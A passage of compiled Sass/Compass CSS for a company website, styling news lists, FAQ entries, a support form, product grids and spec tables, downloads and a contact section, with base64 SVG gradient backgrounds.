/* line 17, ../sass/_index.scss */
.index-row .index_news .index_news_list {
  font-size: 0;
}
/* line 19, ../sass/_index.scss */
.index-row .index_news .index_news_list li {
  margin: 10px 0;
}
/* line 21, ../sass/_index.scss */
.index-row .index_news .index_news_list li .date,
.index-row .index_news .index_news_list li a {
  display: inline-block;
  vertical-align: top;
  letter-spacing: 1px;
  line-height: 15px;
}
/* line 28, ../sass/_index.scss */
.index-row .index_news .index_news_list li .date {
  font-size: 12px;
  width: 75px;
  color: #ff0000;
}
/* line 33, ../sass/_index.scss */
.index-row .index_news .index_news_list li a {
  font-size: 15px;
  line-height: 1.6;
  width: calc(100% - 75px);
  color: #00A0C6;
  text-decoration: underline;
  padding-bottom: 1px;
}
/* line 40, ../sass/_index.scss */
.index-row .index_news .index_news_list li a:hover {
  text-decoration: none;
}
/* line 46, ../sass/_index.scss */
.index-row .index_news .phone {
  text-align: right;
  font-size: 15px;
  color: #00A0C6;
}
/* line 52, ../sass/_index.scss */
.index-row .index_catalogue {
  width: 70%;
}
/* line 54, ../sass/_index.scss */
.index-row .index_catalogue .p_list {
  font-size: 0;
}
/* line 56, ../sass/_index.scss */
.index-row .index_catalogue .p_list li {
  display: inline-block;
  vertical-align: top;
  width: 33.3333%;
  max-height: 50px;
  min-height: 45px;
  padding-right: 2%;
  margin-bottom: 10px;
}
/* line 64, ../sass/_index.scss */
.index-row .index_catalogue .p_list li.phone_p {
  display: none;
}
/* line 67, ../sass/_index.scss */
.index-row .index_catalogue .p_list li a {
  filter: progid:DXImageTransform.Microsoft.Alpha(enabled=false);
  opacity: 1;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 70, ../sass/_index.scss */
.index-row .index_catalogue .p_list li a:hover {
  filter: progid:DXImageTransform.Microsoft.Alpha(Opacity=80);
  opacity: 0.8;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 81, ../sass/_index.scss */
.index-row .index_catalogue .p_list li img {
  width: 100%;
  display: inline-block;
}

/* line 3, ../sass/_about.scss */
#about section > .row {
  margin-bottom: 30px;
}
/* line 5, ../sass/_about.scss */
#about section > .row .img-row,
#about section > .row .text-row {
  float: left;
}
/* line 9, ../sass/_about.scss */
#about section > .row .img-row {
  width: 33.33333%;
  padding: 10px;
  border: 1px solid #0f0f0f;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
}
/* line 14, ../sass/_about.scss */
#about section > .row .img-row .text {
  text-align: center;
  margin-top: 10px;
  font-size: 13px;
}
/* line 20, ../sass/_about.scss */
#about section > .row .text-row {
  width: 66.66666%;
  padding-left: 2%;
}
/* line 23, ../sass/_about.scss */
#about section > .row .text-row .title {
  color: #075aa9;
  position: relative;
  font-size: 15px;
  margin-bottom: 20px;
}
/* line 28, ../sass/_about.scss */
#about section > .row .text-row .title.special {
  margin-bottom: 0;
  margin-top: 20px;
}
/* line 32, ../sass/_about.scss */
#about section > .row .text-row .title > span {
  font-weight: bold;
  display: inline-block;
  vertical-align: middle;
}
/* line 37, ../sass/_about.scss */
#about section > .row .text-row .title:before {
  content: '';
  display: inline-block;
  vertical-align: middle;
  width: 10px;
  height: 10px;
  background-color: #075aa9;
  margin-right: 5px;
}
/* line 47, ../sass/_about.scss */
#about section > .row .text-row > p {
  font-size: 15px;
  line-height: 20px;
}
/* line 55, ../sass/_about.scss */
#about section > .row.row3 .text-row > p .blue_bg {
  display: inline-block;
  vertical-align: middle;
  font-size: 11px;
  color: #fff;
  background-color: #075aa9;
  padding: 1px 3px;
  line-height: normal;
}
/* line 68, ../sass/_about.scss */
#about section > .row.row4 .text-row {
  width: 100%;
  text-align: center;
}

/* line 77, ../sass/_about.scss */
#about2 section {
  padding-left: 3%;
}
/* line 79, ../sass/_about.scss */
#about2 section > .row {
  margin-bottom: 10px;
}
/* line 81, ../sass/_about.scss */
#about2 section > .row.row2, #about2 section > .row.row3, #about2 section > .row.row4, #about2 section > .row.row5, #about2 section > .row.row6 {
  padding-left: 3%;
}
/* line 87, ../sass/_about.scss */
#about2 section > .row.row2 .title, #about2 section > .row.row3 .title, #about2 section > .row.row4 .title, #about2 section > .row.row5 .title, #about2 section > .row.row6 .title {
  font-weight: bold;
  color: #075aa9;
  position: relative;
  font-size: 15px;
  margin-bottom: 20px;
}
/* line 94, ../sass/_about.scss */
#about2 section > .row.row2 .title > span, #about2 section > .row.row3 .title > span, #about2 section > .row.row4 .title > span, #about2 section > .row.row5 .title > span, #about2 section > .row.row6 .title > span {
  display: inline-block;
  vertical-align: middle;
}
/* line 98, ../sass/_about.scss */
#about2 section > .row.row2 .title:before, #about2 section > .row.row3 .title:before, #about2 section > .row.row4 .title:before, #about2 section > .row.row5 .title:before, #about2 section > .row.row6 .title:before {
  content: '';
  display: inline-block;
  vertical-align: middle;
  width: 10px;
  height: 10px;
  background-color: #075aa9;
  margin-right: 5px;
}
/* line 109, ../sass/_about.scss */
#about2 section > .row.row2 > p, #about2 section > .row.row3 > p, #about2 section > .row.row4 > p, #about2 section > .row.row5 > p, #about2 section > .row.row6 > p {
  font-size: 15px;
  line-height: 20px;
}
/* line 116, ../sass/_about.scss */
#about2 section .button {
  text-align: center;
  font-size: 15px;
}
/* line 119, ../sass/_about.scss */
#about2 section .button a {
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI2MyUiIHN0b3AtY29sb3I9IiNmN2Y3ZjciLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiNkM2QzZDQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(63%, #f7f7f7), color-stop(100%, #d3d3d4));
  background-image: -moz-linear-gradient(top, #f7f7f7 63%, #d3d3d4 100%);
  background-image: -webkit-linear-gradient(top, #f7f7f7 63%, #d3d3d4 100%);
  background-image: linear-gradient(to bottom, #f7f7f7 63%, #d3d3d4 100%);
  padding: 5px 25px;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #d3d3d4;
}
/* line 124, ../sass/_about.scss */
#about2 section .button a:hover {
  color: #fff;
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI2MyUiIHN0b3AtY29sb3I9IiNhODE5MTkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiM3NzFhMGQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(63%, #a81919), color-stop(100%, #771a0d));
  background-image: -moz-linear-gradient(top, #a81919 63%, #771a0d 100%);
  background-image: -webkit-linear-gradient(top, #a81919 63%, #771a0d 100%);
  background-image: linear-gradient(to bottom, #a81919 63%, #771a0d 100%);
}

/* line 132, ../sass/_about.scss */
.title-border {
  font-size: 18px;
  background-color: #075aa9;
  color: #fff;
  padding: 5px;
  width: 90px;
  text-align: center;
  margin: 10px 0;
}

/* line 141, ../sass/_about.scss */
.title-border2 {
  font-size: 18px;
  background-color: #075aa9;
  color: #fff;
  padding: 5px;
  text-align: center;
  margin: 10px 0;
  width: 140px;
}

/* line 150, ../sass/_about.scss */
.about2-text ul {
  float: left;
  width: 33.3333%;
}

/* line 154, ../sass/_about.scss */
.about2-text span {
  text-align: center;
  font-size: 15px;
  display: block;
  margin-top: 10px;
}

/* line 161, ../sass/_about.scss */
.about-pic1 {
  width: 70%;
}

/* line 165, ../sass/_about.scss */
.language a {
  color: #00a0ea;
  text-decoration: underline;
  font-size: 15px;
  margin-right: 10px;
}

/* line 172, ../sass/_about.scss */
.block {
  margin: 10px 0;
}
/* line 174, ../sass/_about.scss */
.block h4 {
  color: #075aa9;
  font-size: 13px;
  border: 1px solid rgba(51, 51, 51, 0.6);
  padding: 5px;
}
/* line 180, ../sass/_about.scss */
.block .left, .block .right {
  float: left;
  display: block;
  width: 47.5%;
}
/* line 185, ../sass/_about.scss */
.block .left {
  margin-right: 2.5%;
}
/* line 188, ../sass/_about.scss */
.block .right {
  margin-left: 2.5%;
}
/* line 191, ../sass/_about.scss */
.block ul {
  padding: 5px 0px;
  min-height: 135px;
}
/* line 194, ../sass/_about.scss */
.block ul li {
  padding-left: 20px;
}
/* line 197, ../sass/_about.scss */
.block ul li:before {
  content: '\f0da';
  color: #00a0ea;
  display: inline-block;
  font: normal normal normal 14px/1 FontAwesome;
  vertical-align: middle;
}
/* line 204, ../sass/_about.scss */
.block ul li a {
  display: inline-block;
  vertical-align: middle;
  color: #00a0ea;
  text-decoration: underline;
  font-size: 15px;
  line-height: 1.6;
}

/* line 2, ../sass/_news.scss */
.news_list > li {
  text-align: center;
  font-size: 15px;
  padding: 10px 0;
  border-bottom: 1px dashed;
}
/* line 7, ../sass/_news.scss */
.news_list > li:after {
  content: '';
  display: table;
  clear: both;
  visibility: hidden;
}
/* line 13, ../sass/_news.scss */
.news_list > li > div {
  float: left;
  line-height: 20px;
}
/* line 17, ../sass/_news.scss */
.news_list > li .num {
  width: 70px;
}
/* line 20, ../sass/_news.scss */
.news_list > li .date {
  width: 130px;
  color: #FF0000;
}
/* line 24, ../sass/_news.scss */
.news_list > li .detail {
  width: calc(100% - 200px);
  text-align: left;
  color: #075aa9;
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
}
/* line 32, ../sass/_news.scss */
.news_list > li:first-child {
  border-bottom: none;
  padding: 0;
}
/* line 35, ../sass/_news.scss */
.news_list > li:first-child > div {
  padding: 0 2px;
}
/* line 37, ../sass/_news.scss */
.news_list > li:first-child > div > span {
  width: 100%;
  display: inline-block;
  margin: 0 auto;
  background-color: #E6E6E7;
  border: 1px dashed;
  padding: 10px 0;
}
/* line 46, ../sass/_news.scss */
.news_list > li:first-child .date {
  color: #0f0f0f;
}
/* line 49, ../sass/_news.scss */
.news_list > li:first-child .detail {
  text-align: center;
  color: #0f0f0f;
}

/* line 57, ../sass/_news.scss */
.faq_inner_style .date {
  font-size: 15px;
  line-height: 20px;
  margin: 5px 0;
}
/* line 62, ../sass/_news.scss */
.faq_inner_style .q,
.faq_inner_style .a {
  display: block;
  padding: 10px 0;
  padding-left: 35px;
  font-size: 15px;
  position: relative;
  line-height: 20px;
}
/* line 71, ../sass/_news.scss */
.faq_inner_style .q {
  border-bottom: 1px dashed;
}
/* line 77, ../sass/_news.scss */
.faq_inner_style.faq .q:before,
.faq_inner_style.faq .a:before {
  position: absolute;
  width: 27px;
  height: 27px;
  line-height: 27px;
  left: 3px;
  top: 5px;
  font-size: 20px;
  text-align: center;
  color: #fff;
  -moz-border-radius: 50%;
  -webkit-border-radius: 50%;
  border-radius: 50%;
}
/* line 91, ../sass/_news.scss */
.faq_inner_style.faq .q:before {
  content: 'Q';
  background-color: #075aa9;
}
/* line 97, ../sass/_news.scss */
.faq_inner_style.faq .a:before {
  content: 'A';
  background-color: #FF7F00;
}

/* line 105, ../sass/_news.scss */
.news_inner .date {
  font-size: 15px;
}
/* line 108, ../sass/_news.scss */
.news_inner img {
  max-width: 100%;
  margin: 15px 0;
}

/* line 4, ../sass/_support.scss */
#support section .row1 > p {
  font-size: 15px;
  line-height: 20px;
}

/* line 12, ../sass/_support.scss */
#support_form .title {
  font-size: 15px;
  margin-bottom: 20px;
}
/* line 15, ../sass/_support.scss */
#support_form .title .red,
#support_form .title .blue, #support_form .title:before {
  display: inline-block;
  vertical-align: middle;
}
/* line 21, ../sass/_support.scss */
#support_form .title .red {
  color: #FF0000;
}
/* line 24, ../sass/_support.scss */
#support_form .title .blue {
  color: #075aa9;
}
/* line 27, ../sass/_support.scss */
#support_form .title:before {
  content: '';
  width: 10px;
  height: 10px;
  background-color: #ff0000;
  margin-right: 10px;
}

/* line 37, ../sass/_support.scss */
.form > li {
  font-size: 0;
  margin: 25px 0;
}
/* line 40, ../sass/_support.scss */
.form > li .left,
.form > li .right {
  display: inline-block;
  font-size: 15px;
  vertical-align: top;
}
/* line 46, ../sass/_support.scss */
.form > li .left {
  width: 120px;
  height: 21px;
  line-height: 21px;
  overflow: visible;
}
/* line 51, ../sass/_support.scss */
.form > li .left label {
  text-align: right;
  padding-right: 10px;
  display: block;
  position: relative;
  width: 100%;
  height: 100%;
}
/* line 59, ../sass/_support.scss */
.form > li .left label.s:before {
  content: '*';
  color: #f00;
  display: inline-block;
  vertical-align: top;
}
/* line 65, ../sass/_support.scss */
.form > li .left label.s .hint {
  font-size: 10px;
  background-color: #FFFF4F;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  display: inline-block;
  position: absolute;
  bottom: -20px;
  right: 10px;
  border: 1px solid #FFBF00;
  display: none;
}
/* line 79, ../sass/_support.scss */
.form > li .right {
  width: calc(100% - 120px);
  max-width: 260px;
  height: 21px;
}
/* line 83, ../sass/_support.scss */
.form > li .right input {
  width: 100%;
  height: 100%;
  border: 1px solid;
  margin-bottom: 5px;
}
/* line 89, ../sass/_support.scss */
.form > li .right .ex {
  display: block;
  font-size: 10px;
  color: #f00;
  margin-top: 2px;
}
/* line 95, ../sass/_support.scss */
.form > li .right .select {
  width: 100%;
  height: 100%;
  border: 1px solid;
}
/* line 99, ../sass/_support.scss */
.form > li .right .select select {
  width: 100%;
  height: 100%;
  background: none;
  border: none;
  -moz-border-radius: 0;
  -webkit-border-radius: 0;
  border-radius: 0;
}
/* line 107, ../sass/_support.scss */
.form > li .right.textarea {
  height: auto;
}
/* line 109, ../sass/_support.scss */
.form > li .right.textarea textarea {
  width: 100%;
  height: 150px;
}

/* line 2, ../sass/_product.scss */
.p_list-row li {
  float: left;
  width: 33.333333%;
  margin-bottom: 50px;
}
/* line 7, ../sass/_product.scss */
.p_list-row li.search-row {
  width: 100%;
  margin: 0 auto;
  padding: 20px 0px;
  border-bottom: 1px #c8c8c8 solid;
}
/* line 13, ../sass/_product.scss */
.p_list-row li.search-row a {
  border: none;
  text-align: left;
}
/* line 17, ../sass/_product.scss */
.p_list-row li.search-row a .title {
  text-align: left;
  font-size: 15px;
  line-height: 2;
  color: #075aa9;
}
/* line 23, ../sass/_product.scss */
.p_list-row li.search-row a .text {
  font-size: 13px;
  line-height: 2;
  color: #666;
}
/* line 30, ../sass/_product.scss */
.p_list-row li.search-row:hover {
  background: #EEE;
}
/* line 36, ../sass/_product.scss */
.p_list-row li a {
  display: block;
  width: 90%;
  border: 1px solid #8C8C8C;
  padding: 8px;
  padding-bottom: 0;
  overflow: hidden;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 45, ../sass/_product.scss */
.p_list-row li a *,
.p_list-row li a *:before {
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 50, ../sass/_product.scss */
.p_list-row li a:hover *,
.p_list-row li a:hover *:before {
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 55, ../sass/_product.scss */
.p_list-row li a .bg_img {
  width: 100%;
  padding-bottom: 100%;
  height: 0;
  position: relative;
  display: block;
  background-position: 50% 50%;
  -webkit-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  background-repeat: no-repeat;
  overflow: hidden;
}
/* line 63, ../sass/_product.scss */
.p_list-row li a .bg_img:before {
  content: '';
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(255, 255, 255, 0);
  z-index: 10;
}
/* line 73, ../sass/_product.scss */
.p_list-row li a .bg_img .p_info {
  position: absolute;
  left: 0;
  top: 0;
  text-align: center;
  width: 100%;
  height: 100%;
  font-size: 0;
  top: 100%;
  z-index: 500;
}
/* line 83, ../sass/_product.scss */
.p_list-row li a .bg_img .p_info:before {
  content: '';
  display: inline-block;
  vertical-align: middle;
  width: 0;
  height: 100%;
}
/* line 90, ../sass/_product.scss */
.p_list-row li a .bg_img .p_info > p {
  display: inline-block;
  vertical-align: middle;
  font-size: 15px;
  color: #1286B3;
  line-height: 1.6;
}
/* line 99, ../sass/_product.scss */
.p_list-row li a .p_name {
  width: 100%;
  display: block;
  text-align: center;
  white-space: nowrap;
  overflow: hidden;
  font-size: 15px;
  line-height: 25px;
}
/* line 110, ../sass/_product.scss */
.p_list-row li a:hover .bg_img:before {
  background-color: rgba(255, 255, 255, 0.8);
}
/* line 113, ../sass/_product.scss */
.p_list-row li a:hover .bg_img > .p_info {
  top: 0;
}
/* line 117, ../sass/_product.scss */
.p_list-row li a:hover .p_name {
  color: #1286B3;
}
/* line 127, ../sass/_product.scss */
.p_list-row.p2 li a .bg_img:before {
  content: none;
}
/* line 133, ../sass/_product.scss */
.p_list-row.p2 li a:hover .bg_img:before {
  content: none;
}

/* line 145, ../sass/_product.scss */
.p2_editor .arrow_li li,
.p3_editor .arrow_li li {
  font-size: 15px;
  line-height: 24px;
}
/* line 148, ../sass/_product.scss */
.p2_editor .arrow_li li:before,
.p3_editor .arrow_li li:before {
  content: '';
  width: 0;
  height: 0;
  display: inline-block;
  border-top: 3px solid transparent;
  border-bottom: 3px solid transparent;
  border-left: 3px solid;
  vertical-align: middle;
  margin-right: 3px;
}
/* line 161, ../sass/_product.scss */
.p2_editor .p2_table,
.p2_editor .p2_table2,
.p2_editor .p2_table3,
.p3_editor .p2_table,
.p3_editor .p2_table2,
.p3_editor .p2_table3 {
  border-collapse: collapse;
  width: 100%;
  max-width: 610px;
  margin-bottom: 10px;
}
/* line 169, ../sass/_product.scss */
.p2_editor .p2_table tr th,
.p2_editor .p2_table tr td,
.p2_editor .p2_table2 tr th,
.p2_editor .p2_table2 tr td,
.p2_editor .p2_table3 tr th,
.p2_editor .p2_table3 tr td,
.p3_editor .p2_table tr th,
.p3_editor .p2_table tr td,
.p3_editor .p2_table2 tr th,
.p3_editor .p2_table2 tr td,
.p3_editor .p2_table3 tr th,
.p3_editor .p2_table3 tr td {
  text-align: center;
  vertical-align: middle;
  padding: 5px 0;
}
/* line 174, ../sass/_product.scss */
.p2_editor .p2_table tr th img,
.p2_editor .p2_table tr td img,
.p2_editor .p2_table2 tr th img,
.p2_editor .p2_table2 tr td img,
.p2_editor .p2_table3 tr th img,
.p2_editor .p2_table3 tr td img,
.p3_editor .p2_table tr th img,
.p3_editor .p2_table tr td img,
.p3_editor .p2_table2 tr th img,
.p3_editor .p2_table2 tr td img,
.p3_editor .p2_table3 tr th img,
.p3_editor .p2_table3 tr td img {
  display: inline-block;
  vertical-align: middle;
}
/* line 179, ../sass/_product.scss */
.p2_editor .p2_table tr th,
.p2_editor .p2_table2 tr th,
.p2_editor .p2_table3 tr th,
.p3_editor .p2_table tr th,
.p3_editor .p2_table2 tr th,
.p3_editor .p2_table3 tr th {
  border: 1px solid #fff;
  background-color: #3F3F3F;
  color: #fff;
}
/* line 184, ../sass/_product.scss */
.p2_editor .p2_table tr td,
.p2_editor .p2_table2 tr td,
.p2_editor .p2_table3 tr td,
.p3_editor .p2_table tr td,
.p3_editor .p2_table2 tr td,
.p3_editor .p2_table3 tr td {
  border: 1px solid #000;
  font-size: 12px;
}
/* line 187, ../sass/_product.scss */
.p2_editor .p2_table tr td a,
.p2_editor .p2_table2 tr td a,
.p2_editor .p2_table3 tr td a,
.p3_editor .p2_table tr td a,
.p3_editor .p2_table2 tr td a,
.p3_editor .p2_table3 tr td a {
  color: #128683;
}
/* line 190, ../sass/_product.scss */
.p2_editor .p2_table tr td > div,
.p2_editor .p2_table2 tr td > div,
.p2_editor .p2_table3 tr td > div,
.p3_editor .p2_table tr td > div,
.p3_editor .p2_table2 tr td > div,
.p3_editor .p2_table3 tr td > div {
  line-height: 20px;
}
/* line 195, ../sass/_product.scss */
.p2_editor .p2_table .hidden,
.p2_editor .p2_table2 .hidden,
.p2_editor .p2_table3 .hidden,
.p3_editor .p2_table .hidden,
.p3_editor .p2_table2 .hidden,
.p3_editor .p2_table3 .hidden {
  visibility: hidden;
}

/* line 202, ../sass/_product.scss */
.editor_for_img ul li {
  display: inline-block;
  vertical-align: top;
  max-width: 195px;
  margin-right: 5px;
  margin-bottom: 20px;
}
/* line 208, ../sass/_product.scss */
.editor_for_img ul li .pic {
  width: 195px;
  max-width: 195px;
  padding-bottom: 80%;
  height: 0;
}
/* line 214, ../sass/_product.scss */
.editor_for_img ul li p {
  line-height: 18px;
  font-size: 15px;
}

/* line 221, ../sass/_product.scss */
.p3 {
  margin-top: 50px;
}
/* line 224, ../sass/_product.scss */
.p3 .select-row li {
  float: left;
  width: 12%;
  margin-right: 1px;
  text-align: center;
  padding: 12px 0;
  font-size: 15px;
  border: 1px solid #ccc;
  cursor: pointer;
  -moz-border-radius-topleft: 10px;
  -webkit-border-top-left-radius: 10px;
  border-top-left-radius: 10px;
  -moz-border-radius-topright: 10px;
  -webkit-border-top-right-radius: 10px;
  border-top-right-radius: 10px;
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI1MCUiIHN0b3AtY29sb3I9IiNmN2Y3ZjciLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiNkM2QzZDQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(50%, #f7f7f7), color-stop(100%, #d3d3d4));
  background-image: -moz-linear-gradient(top, #f7f7f7 50%, #d3d3d4);
  background-image: -webkit-linear-gradient(top, #f7f7f7 50%, #d3d3d4);
  background-image: linear-gradient(to bottom, #f7f7f7 50%, #d3d3d4);
}
/* line 236, ../sass/_product.scss */
.p3 .select-row li:hover, .p3 .select-row li.active {
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI3MCUiIHN0b3AtY29sb3I9IiMwNzVhYTkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiM3NWI2ZTQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(70%, #075aa9), color-stop(100%, #75b6e4));
  background-image: -moz-linear-gradient(top, #075aa9 70%, #75b6e4 100%);
  background-image: -webkit-linear-gradient(top, #075aa9 70%, #75b6e4 100%);
  background-image: linear-gradient(to bottom, #075aa9 70%, #75b6e4 100%);
  color: #fff;
}

/* line 245, ../sass/_product.scss */
.select_item > li {
  padding: 20px 10px;
}

/* line 251, ../sass/_product.scss */
ul.inlineblock_img li {
  display: inline-block;
}

/* line 256, ../sass/_product.scss */
table.p3 {
  width: 100%;
  max-width: 610px;
  table-layout: collapse;
  border: 1px #5e5e5e solid;
  margin: 0;
  margin-bottom: 10px !important;
}

/* line 265, ../sass/_product.scss */
table.p3 a {
  color: #128683;
}

/* line 268, ../sass/_product.scss */
table.p3 th, table.p3 td {
  background: #3F3F3F;
  color: #FFF;
  text-align: center;
  font-size: 12px;
  border: 1px #FFF solid;
  padding: 5px;
  vertical-align: middle;
  text-align: cnter;
}

/* line 278, ../sass/_product.scss */
table.p3 th span {
  display: block;
  font-size: 10px;
  vertical-align: middle;
}

/* line 283, ../sass/_product.scss */
table.p3 td {
  background: #FFF;
  border: 1px #5e5e5e solid;
  color: #000;
  vertical-align: middle;
}

/* line 289, ../sass/_product.scss */
table.p3 td.model {
  min-width: 83px;
}

/* line 292, ../sass/_product.scss */
table.p3 td.emit {
  width: 100px;
  vertical-align: middle;
}

/* line 296, ../sass/_product.scss */
table.p3 td.dime {
  width: 71px;
  vertical-align: middle;
}

/* line 2, ../sass/_download.scss */
.download_list li {
  margin-bottom: 30px;
}
/* line 4, ../sass/_download.scss */
.download_list li:after {
  content: '';
  display: table;
  clear: both;
  visibility: hidden;
}
/* line 10, ../sass/_download.scss */
.download_list li .img-row,
.download_list li .text-row {
  float: left;
}
/* line 14, ../sass/_download.scss */
.download_list li .img-row {
  width: 235px;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #9c9c9b;
  padding: 10px;
}
/* line 19, ../sass/_download.scss */
.download_list li .img-row a {
  display: block;
  position: relative;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 23, ../sass/_download.scss */
.download_list li .img-row a * {
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 27, ../sass/_download.scss */
.download_list li .img-row a:hover * {
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 31, ../sass/_download.scss */
.download_list li .img-row a img {
  position: relative;
  z-index: 1000;
}
/* line 35, ../sass/_download.scss */
.download_list li .img-row a .name {
  display: block;
  position: absolute;
  text-align: center;
  color: #075aa9;
  width: 100%;
  height: 100%;
  font-size: 0;
  left: 0;
  top: 0;
  z-index: 2000;
  background-color: rgba(255, 255, 255, 0);
}
/* line 47, ../sass/_download.scss */
.download_list li .img-row a .name:before {
  content: '';
  display: inline-block;
  vertical-align: middle;
  height: 100%;
  width: 0;
}
/* line 54, ../sass/_download.scss */
.download_list li .img-row a .name p {
  display: inline-block;
  vertical-align: middle;
  font-size: 18px;
  position: relative;
  opacity: 0;
  top: 100px;
}
/* line 64, ../sass/_download.scss */
.download_list li .img-row a:hover .name {
  background-color: rgba(255, 255, 255, 0.8);
}
/* line 66, ../sass/_download.scss */
.download_list li .img-row a:hover .name p {
  top: 0;
  opacity: 1;
}
/* line 74, ../sass/_download.scss */
.download_list li .text-row {
  width: calc(100% - 235px);
  padding-left: 15px;
}
/* line 77, ../sass/_download.scss */
.download_list li .text-row .download_text {
  font-weight: bold;
  font-size: 15px;
  color: #075aa9;
  display: inline-block;
  line-height: 20px;
  margin-bottom: 10px;
}
/* line 84, ../sass/_download.scss */
.download_list li .text-row .download_text:hover {
  text-decoration: underline;
}
/* line 88, ../sass/_download.scss */
.download_list li .text-row .text {
  font-size: 15px;
  line-height: 20px;
}

/* line 4, ../sass/_contact.scss */
#contact section .row1 .g_map,
#contact section .row1 .info-row {
  float: left;
}
/* line 8, ../sass/_contact.scss */
#contact section .row1 .g_map {
  width: 50%;
}
/* line 10, ../sass/_contact.scss */
#contact section .row1 .g_map iframe {
  width: 100%;
  height: 180px;
}
/* line 15, ../sass/_contact.scss */
#contact section .row1 .info-row {
  width: 240px;
  max-width: 100%;
  margin-left: 2%;
  padding: 10px;
